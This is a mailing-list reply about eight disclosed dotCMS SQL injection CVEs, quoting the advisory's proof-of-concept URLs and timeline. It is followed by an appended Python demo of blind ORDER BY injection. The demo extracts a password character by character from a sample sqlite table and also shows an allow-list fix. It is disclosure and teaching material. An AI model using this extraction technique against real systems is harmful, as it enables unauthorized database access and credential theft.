> On Oct 31, 2016, at 2:41 PM, Elar Lang <elarlang@xxxxxxxxx> wrote:
>
> Title: Multiple SQL injection vulnerabilities in dotCMS (8x CVE)
> Credit: Elar Lang / https://security.elarlang.eu
> Vendor/Product: dotCMS (http://dotcms.com/)
> Vulnerability: SQL injection
> Vulnerable version: before 3.5; 3.3.1 and 3.3.2 (depends on CVE)
> CVE: CVE-2016-8902, CVE-2016-8903, CVE-2016-8904, CVE-2016-8905,
> CVE-2016-8906, CVE-2016-8907, CVE-2016-8908, CVE-2016-4040
>
>
> # Multiple SQL injections in dotCMS framework.
>
>
> ## CVE-2016-8902 - categoriesServlet, sort
>

I am having trouble reproducing this one on 3.3 and 3.2.4. As an unauthenticated user on a clean install of dotCMS, I perform this request.

GET /categoriesServlet?start=0&count=10&sort=asc HTTP/1.1
Host: 10.211.55.37:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: dmid=47c0772e-83aa-4741-aec6-c9cefa7155c8; JSESSIONID=8EC35440A01B976EA9A6F02D6FB6886F
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

In your blog post, you note JSON is supposed to be returned, but that doesn’t happen. The response I get is a simple 200.

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
SET-COOKIE: dmid=47c0772e-83aa-4741-aec6-c9cefa7155c8;Path=/
SET-COOKIE: JSESSIONID=8EC35440A01B976EA9A6F02D6FB6886F;Path=/
Cache-Control: public, no-store, no-cache, max-age=0
Pragma: no-cache
Expires: Tue, 01 Nov 2016 14:55:34 GMT
Content-Type: text/plain;charset=utf-8
Content-Length: 0
Date: Tue, 01 Nov 2016 14:55:34 GMT

What versions exactly did you test against to reproduce this and what was the setup? I am also curious why a UNION doesn’t work (mentioned in blog post) if you dug into that.

Thanks!

> SQL injection vulnerability in the categoriesServlet in dotCMS before
> 3.3.1 allows remote not authenticated attackers to execute arbitrary
> SQL commands via the sort parameter.
>
> Preconditions: None. No authentication needed.
>
> Proof-of-Concept URL, vulnerable parameter is "sort":
> /categoriesServlet?start=0&count=10&sort=SQLi
>
>
> ## CVE-2016-8903 - "Templates pages", _EXT_13_orderby
>
> SQL injection vulnerability in the "Site Browser > Templates pages"
> screen in dotCMS before 3.3.1 allows remote authenticated attackers to
> execute arbitrary SQL commands via the _EXT_13_orderby parameter.
>
> Preconditions: attacker must be authenticated.
>
> Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > Templates
> pages", click on some column title in the resultset table):
> /c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_13&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_13_struts_action=%2Fext%2Ftemplates%2Fview_templates&_EXT_13_pageNumber=1&_EXT_13_orderby=SQLi
>
>
> ## CVE-2016-8904 - "Containers pages", _EXT_12_orderby
>
> SQL injection vulnerability in the "Site Browser > Containers pages"
> screen in dotCMS before 3.3.1 allows remote authenticated attackers to
> execute arbitrary SQL commands via the _EXT_12_orderby parameter.
>
> Preconditions: attacker must be authenticated.
>
> Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > Containers
> pages", click on some column title in the resultset table):
> /c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_12&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_12_struts_action=%2Fext%2Fcontainers%2Fview_containers&_EXT_12_pageNumber=1&_EXT_12_orderby=SQLi
>
>
> ## CVE-2016-8905 - JSONTags servlet, sort
>
> SQL injection vulnerability in the JSONTags servlet in dotCMS before
> 3.3.1 allows remote authenticated attackers to execute arbitrary SQL
> commands via the sort parameter.
>
> Preconditions: attacker must be authenticated.
>
> Proof-of-Concept
> /JSONTags?start=0&count=10&sort=tagname SQLi
>
>
> ## CVE-2016-8906 - "Links pages", _EXT_18_orderby
>
> SQL injection vulnerability in the "Site Browser > Links page" screen
> in dotCMS before 3.3.1 allows remote authenticated attackers to
> execute arbitrary SQL commands via the _EXT_18_orderby parameter.
>
> Preconditions: attacker must be authenticated.
>
> Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > Links
> pages", click on some column title in the resultset table):
> /c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_18&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_18_struts_action=%2Fext%2Flinks%2Fview_links&_EXT_18_pageNumber=1&_EXT_18_orderby=SQLi
>
>
> ## CVE-2016-8907 - "Content Types", _EXT_STRUCTURE_orderBy and
> _EXT_STRUCTURE_direction
>
> SQL injection vulnerability in the "Content Types > Content Types"
> screen in dotCMS before 3.3.1 allows remote authenticated attackers to
> execute arbitrary SQL commands via the _EXT_STRUCTURE_orderBy and
> _EXT_STRUCTURE_direction parameters.
>
> Preconditions: attacker must be authenticated.
>
> Proof-of-Concept URL (from "Admin Site" UI: "Content Types > Content
> Types", click on some column title in the resultset table)
> /c/portal/layout?p_l_id=56fedb43-dbbf-4ce2-8b77-41fb73bad015&p_p_id=EXT_STRUCTURE&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_STRUCTURE_struts_action=%2Fext%2Fstructure%2Fview_structure&_EXT_STRUCTURE_orderBy=SQLi&_EXT_STRUCTURE_direction=SQLi
>
>
> ## CVE-2016-8908 - "HTML pages", _EXT_15_orderby
>
> SQL injection vulnerability in the "Site Browser > HTML pages" screen
> in dotCMS before 3.3.1 allows remote authenticated attackers to
> execute arbitrary SQL commands via the _EXT_15_orderby parameter.
>
> Preconditions: attacker must be authenticated.
>
> Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > HTML
> pages", click on some column title in the resultset table):
> /c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_15&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_15_struts_action=%2Fext%2Fhtmlpages%2Fview_htmlpages&_EXT_15_orderby=modDate,SQLi&_EXT_15_pageNumber=1
>
>
> ## CVE-2016-4040 - "Workflow", _EXT_15_orderby
>
> SQL injection vulnerability in the "Workflow Screen" in dotCMS before
> 3.3.2 allows remote administrators to execute arbitrary SQL commands
> via the _EXT_15_orderby parameter.
>
> Preconditions: attacker must be authenticated.
>
> Proof-of-Concept URL (from "Admin Site" UI: "Home > Workflow tasks",
> click on some column title in the resultset table)
> /html/portlet/ext/workflows/view_tasks_list.jsp?schemeId=&assignedTo=&createdBy=&stepId=&open=false&closed=true&keywords=&orderBy=SQLi&count=1&page=1
>
>
> # Vulnerability Disclosure Timeline
>
> 2015-12-14 | me > dotCMS | 8 SQL injection vulnerabilities
> 2015-12-14 | dotCMS > me | they were planning fixes in upcoming
> release, estimated to beginning of 2016
> 2016-03-16 | dotCMS | dotCMS version 3.3.1 release (CVE-2016-4040
> still not fixed)
> 2016-04-07 | me > dotCMS | what is the situation with reported
> vulnerabilities?
> 2016-04-07 | dotCMS > me | CVE-2016-4040 will be fixed in 3.5, which
> is estimated to be out in mid-April
> 2016-04-19 | dotCMS | dotCMS version 3.5 release
> 2016-05-10 | dotCMS | dotCMS version 3.3.2 release
> 2016-10-31 | me | Full Disclosure on http://security.elarlang.eu
>
>
> # Related fixes and releases
> https://dotcms.com/docs/latest/change-log#release-3.3.1
> https://dotcms.com/docs/latest/change-log#release-3.5
> https://dotcms.com/docs/latest/change-log#release-3.3.2
>
> --
> Elar Lang
> Blog @ https://security.elarlang.eu
> Pentester, lecturer @ http://www.clarifiedsecurity.com
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
Attachment:
signature.asc
Description: Message signed with OpenPGP using GPGMail
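Every finding in the quoted advisory has the same shape: a "sort"/"orderby" request parameter lands in an ORDER BY clause. The example below is an added illustration of that pattern and is not dotCMS code or anything from the advisory or this thread; the table and column names (tag, tagname, tag_count, user_, password_) and the sample rows are constructed for the demo. It uses Python's sqlite3 so it runs offline. An ORDER BY position accepts an expression rather than a full SELECT, so the payload here is a CASE expression wrapping a scalar subquery: the ordering of the result flips depending on whether the attacker's condition is true, which is enough to read other tables one character at a time. The hardened version allow-lists the column and direction instead of interpolating request text.

```python
import sqlite3

# Constructed sample data for the demo (not dotCMS's real schema).
TAGS = [("alpha", 3), ("bravo", 1), ("charlie", 2)]
ALLOWED_SORT_COLUMNS = {"tagname", "tag_count"}


def _connect():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tag (tagname TEXT, tag_count INTEGER)")
    con.executemany("INSERT INTO tag VALUES (?, ?)", TAGS)
    # A second table the attacker wants to read; constructed for the example.
    con.execute("CREATE TABLE user_ (userid TEXT, password_ TEXT)")
    con.execute("INSERT INTO user_ VALUES ('admin', 's3cret')")
    return con


def list_tags_vulnerable(sort):
    """The flawed pattern: the sort parameter is concatenated into ORDER BY.
    Bind parameters cannot help here, since a column name is not a value."""
    con = _connect()
    sql = "SELECT tagname FROM tag ORDER BY " + sort
    return [row[0] for row in con.execute(sql)]


def list_tags_fixed(sort, direction="asc"):
    """Hardened form: map request text onto a fixed allow-list of columns
    and directions, and reject anything else before touching SQL."""
    if sort not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unknown sort column")
    if direction.lower() not in ("asc", "desc"):
        raise ValueError("bad sort direction")
    con = _connect()
    sql = f"SELECT tagname FROM tag ORDER BY {sort} {direction}"
    return [row[0] for row in con.execute(sql)]


def blind_oracle(condition_sql):
    """Boolean-based blind inference through ORDER BY.
    If the condition is true the rows sort by tagname (alphabetical);
    if false they sort by tag_count (numeric), so the row order itself
    leaks one bit per request."""
    payload = f"(CASE WHEN ({condition_sql}) THEN tagname ELSE tag_count END)"
    return list_tags_vulnerable(payload) == ["alpha", "bravo", "charlie"]


def extract_password(max_len=16):
    """Recover user_.password_ for 'admin' one character at a time by
    asking the oracle about each position."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = (f"SELECT substr(password_,{pos},1)='{ch}' "
                    f"FROM user_ WHERE userid='admin'")
            if blind_oracle(cond):
                found += ch
                break
        else:
            break  # no character matched: end of the string
    return found


if __name__ == "__main__":
    print("vulnerable, sort=tagname  :", list_tags_vulnerable("tagname"))
    print("vulnerable, sort=tag_count:", list_tags_vulnerable("tag_count"))
    print("leaked via ORDER BY       :", extract_password())
    print("fixed, sort=tag_count desc:", list_tags_fixed("tag_count", "desc"))
    try:
        list_tags_fixed("tagname, (SELECT 1)")
    except ValueError as e:
        print("fixed rejects payload     :", e)
```

The oracle needs no error messages and no visible data from the injected subquery, only a response whose ordering the attacker can observe, which is why a sortable listing page is a comfortable target. Appending a payload after a unique first sort key (the modDate,SQLi shape in the advisory) still executes the expression, but the ordering signal is then lost, so the CASE expression is placed as the leading key here.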